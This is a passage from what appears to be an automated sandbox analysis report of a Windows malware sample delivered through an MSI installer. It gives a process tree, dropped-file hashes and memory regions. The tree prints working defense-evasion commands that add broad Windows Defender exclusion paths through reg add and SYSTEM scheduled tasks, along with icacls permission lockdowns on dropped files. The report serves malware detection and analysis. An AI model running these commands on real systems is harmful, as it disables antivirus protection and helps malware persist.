                                        PID:5116
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\T5tunD\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:4640
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      PID:4584
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:4748
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4808
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1380
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:1244
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\T5tunD\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4420
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\thumbs.db" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:3048
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\T5tunD\thumbs.db" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4900
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:4136
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\T5tunD\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:3940
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      PID:1212
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:5032
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3748
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2996
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:2988
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\T5tunD\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:3208
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\XPSPLOG.dll" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:4640
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\T5tunD\XPSPLOG.dll" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:340
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:3952
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\T5tunD\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:1588
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\T5tunD\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:472
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:4748
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\T5tunD\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                          4⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          • System Location Discovery: System Language Discovery
                                          PID:2608
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\7HxuIV" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:3436
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\7HxuIV" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:2468
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe
                                    1⤵
                                      PID:2160
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:2572
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3748
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:2348
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3680
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4536
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3104
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:1392
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4696
                                    • C:\Program Files (x86)\T5tunD\T5tunD.exe
                                      "C:\Program Files (x86)\T5tunD\T5tunD.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:5040
                                    • C:\Program Files (x86)\3dR0dt0Aj\q6656ItHA.exe
                                      "C:\Program Files (x86)\3dR0dt0Aj\q6656ItHA.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4164
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\T5tunD" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:440
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\T5tunD" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3144
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:1520
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4848
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:3724
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3896
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:1380
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:2328

                                    Network

                                          MITRE ATT&CK Enterprise v16

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          e58b235.rbs

                                          • Path C:\Config.Msi\e58b235.rbs
                                          • Size 7KB
                                          • SHA256 794ff3e45f755eace65c979573edad262f922c3a43d6384dbdf7c39a238e0015
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\3dR0dt0Aj\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 540376a4a9ac4a39152ddd4421355b952b360d6aee99e0148acf910b342d5a2d
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\3dR0dt0Aj\image.png
                                          • Size 5.0MB
                                          • SHA256 f9cb7835afc171769f1a6d9668b3b816521925141e64ba0033163cf436fa5eec
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          T5tunD.exe

                                          • Path C:\Program Files (x86)\T5tunD\T5tunD.exe
                                          • Size 145KB
                                          • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\T5tunD\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 2bd6d9dbf9f7a5799414c672e3ae3b1a3b35e712aaf0bc815ff19c06ed3e5bbd
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\T5tunD\image.png
                                          • Size 5.0MB
                                          • SHA256 4468430a703719789b95ceb05557094c748ef01b0e2a60a2bbdcb5e8daab3121
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          thumbs.db

                                          • Path C:\Program Files (x86)\T5tunD\thumbs.db
                                          • Size 358KB
                                          • SHA256 42f0cf0929abfdcd36e4519a5546d7dd3df6b883ffef4d6c336efe4e500cb24b
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          __PSScriptPolicyTest_bucrieur.vhx.ps1

                                          • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bucrieur.vhx.ps1
                                          • Size 60B
                                          • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                          • MD5 SHA1 SHA512 TLSH

                                          I9duBk.exe

                                          • Path C:\Users\Public\7HxuIV\I9duBk.exe
                                          • Size 135KB
                                          • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          UxEnhance64.dll

                                          • Path C:\Users\Public\7HxuIV\UxEnhance64.dll
                                          • Size 3.1MB
                                          • SHA256 6e44cb46e055485797ed23c54582a0209bebc14a8f3e2ac3f67bf9fcc1751566
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          adoresd.dat

                                          • Path C:\Users\Public\7HxuIV\adoresd.dat
                                          • Size 4.7MB
                                          • SHA256 78eaca3516a4d13e4042811091975ca4d6bda9ba3757377a8cd97defbc79d0a0
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          msadox.tb

                                          • Path C:\Users\Public\7HxuIV\msadox.tb
                                          • Size 8KB
                                          • SHA256 e31c3c457c93e1066a5fc2f10f5dbda0e97076a921bbd01597db2278283dd890
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          destopbak.ini

                                          • Path C:\Users\Public\Music\destopbak.ini
                                          • Size 2B
                                          • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                          • MD5 SHA1 SHA512

                                          MSIB38D.tmp

                                          • Path C:\Windows\Installer\MSIB38D.tmp
                                          • Size 9.2MB
                                          • SHA256 a2ff862cc8bb35b1bdc52e41e27eed881315cd20608662846c2720c98803d969
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          e58b234.msi

                                          • Path C:\Windows\Installer\e58b234.msi
                                          • Size 9.2MB
                                          • SHA256 9a653daf95c5875771e7b145158a81c58c7db2ec07700a12cca013055ab8faa6
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          metadata-2

                                          • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                          • Size 24.1MB
                                          • SHA256 57d01a603a2b854f1641849f119a22ba3b110710b506df57e995ab8eead43828
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          {6009411d-39af-4922-ae51-13e5222e0650}_OnDiskSnapshotProp

                                          • Path \??\Volume{d78106ee-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{6009411d-39af-4922-ae51-13e5222e0650}_OnDiskSnapshotProp
                                          • Size 6KB
                                          • SHA256 52e20fe9fd0cff605d09ef3f8d67f87705aac0af02c462928d231f9852cbcfce
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          xxxx.ini

                                          • Path \??\c:\xxxx.ini
                                          • Size 2B
                                          • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                          • MD5 SHA1 SHA512

                                          memory/780-211-0x0000000003A60000-0x0000000004267000-memory.dmp

                                          memory/780-193-0x0000000001280000-0x0000000001294000-memory.dmp

                                          memory/780-206-0x0000000003A60000-0x0000000004267000-memory.dmp

                                          memory/780-186-0x0000000003A60000-0x0000000004267000-memory.dmp

                                          memory/780-215-0x0000000010000000-0x0000000010061000-memory.dmp

                                          memory/780-182-0x0000000003A60000-0x0000000004267000-memory.dmp

                                          memory/780-181-0x0000000001260000-0x0000000001261000-memory.dmp

                                          memory/780-179-0x0000000003A60000-0x0000000004267000-memory.dmp

                                          memory/780-242-0x0000000003A60000-0x0000000004267000-memory.dmp

                                          memory/780-175-0x0000000075260000-0x00000000759AA000-memory.dmp

                                          memory/780-174-0x0000000001240000-0x0000000001241000-memory.dmp

                                          memory/780-265-0x0000000003A60000-0x0000000004267000-memory.dmp

                                          memory/2864-64-0x00007FFBEDA00000-0x00007FFBEDA02000-memory.dmp

                                          memory/2864-56-0x00007FFBED9F0000-0x00007FFBED9F2000-memory.dmp

                                          memory/2864-91-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/2864-81-0x000001E4E3B50000-0x000001E4E3B9E000-memory.dmp

                                          memory/2864-82-0x000001E4E4E60000-0x000001E4E4EEA000-memory.dmp

                                          memory/2864-83-0x000001E4E4E60000-0x000001E4E4EEA000-memory.dmp

                                          memory/2864-85-0x000001E4E4E60000-0x000001E4E4EEA000-memory.dmp

                                          memory/2864-84-0x000001E4E4E60000-0x000001E4E4EEA000-memory.dmp

                                          memory/2864-76-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/2864-72-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/2864-71-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/2864-70-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/2864-65-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/2864-69-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/2864-62-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/2864-57-0x00007FFBCE680000-0x00007FFBCEB9E000-memory.dmp

                                          memory/2864-90-0x000001E4E4530000-0x000001E4E4DC1000-memory.dmp

                                          memory/3836-296-0x0000000007140000-0x00000000071D6000-memory.dmp

                                          memory/3836-291-0x00000000061A0000-0x00000000061BE000-memory.dmp

                                          memory/3836-280-0x0000000005BB0000-0x0000000005BCE000-memory.dmp

                                          memory/3836-281-0x0000000005BE0000-0x0000000005C2C000-memory.dmp

                                          memory/3836-269-0x0000000004BE0000-0x0000000004C02000-memory.dmp

                                          memory/3836-279-0x0000000005590000-0x00000000058E4000-memory.dmp

                                          memory/3836-293-0x0000000007510000-0x0000000007B8A000-memory.dmp

                                          memory/3836-294-0x0000000006EC0000-0x0000000006EDA000-memory.dmp

                                          memory/3836-292-0x0000000006D90000-0x0000000006E33000-memory.dmp

                                          memory/3836-295-0x0000000006F40000-0x0000000006F4A000-memory.dmp

                                          memory/3836-282-0x0000000006150000-0x0000000006182000-memory.dmp

                                          memory/3836-297-0x00000000070C0000-0x00000000070D1000-memory.dmp

                                          memory/3836-276-0x0000000005520000-0x0000000005586000-memory.dmp

                                          memory/3836-270-0x00000000054B0000-0x0000000005516000-memory.dmp

                                          memory/3836-283-0x0000000073980000-0x00000000739CC000-memory.dmp

                                          memory/3836-267-0x00000000045D0000-0x0000000004606000-memory.dmp

                                          memory/3836-268-0x0000000004D10000-0x0000000005338000-memory.dmp

                                          memory/4164-233-0x0000000001160000-0x0000000001161000-memory.dmp

                                          memory/4164-253-0x0000000001290000-0x0000000001291000-memory.dmp

                                          memory/4164-254-0x0000000003830000-0x0000000004037000-memory.dmp

                                          memory/4164-257-0x0000000001160000-0x0000000001161000-memory.dmp

                                          memory/4164-239-0x0000000003830000-0x0000000004037000-memory.dmp

                                          memory/4164-234-0x0000000073940000-0x000000007408A000-memory.dmp

                                          memory/4420-12-0x00007FFBED9F0000-0x00007FFBED9F2000-memory.dmp

                                          memory/4420-13-0x00007FFBCE560000-0x00007FFBCEB94000-memory.dmp

                                          memory/4420-16-0x00007FFBDEB50000-0x00007FFBDEB60000-memory.dmp

                                          memory/4420-42-0x00007FFBDEB50000-0x00007FFBDEB60000-memory.dmp

                                          memory/5040-247-0x0000000000890000-0x0000000000891000-memory.dmp

                                          memory/5040-243-0x0000000000A20000-0x0000000000A21000-memory.dmp

                                          memory/5040-244-0x0000000002E40000-0x0000000003647000-memory.dmp

                                          memory/5040-231-0x0000000002E40000-0x0000000003647000-memory.dmp

                                          memory/5040-227-0x0000000000890000-0x0000000000891000-memory.dmp

                                          memory/5040-228-0x0000000075260000-0x00000000759AA000-memory.dmp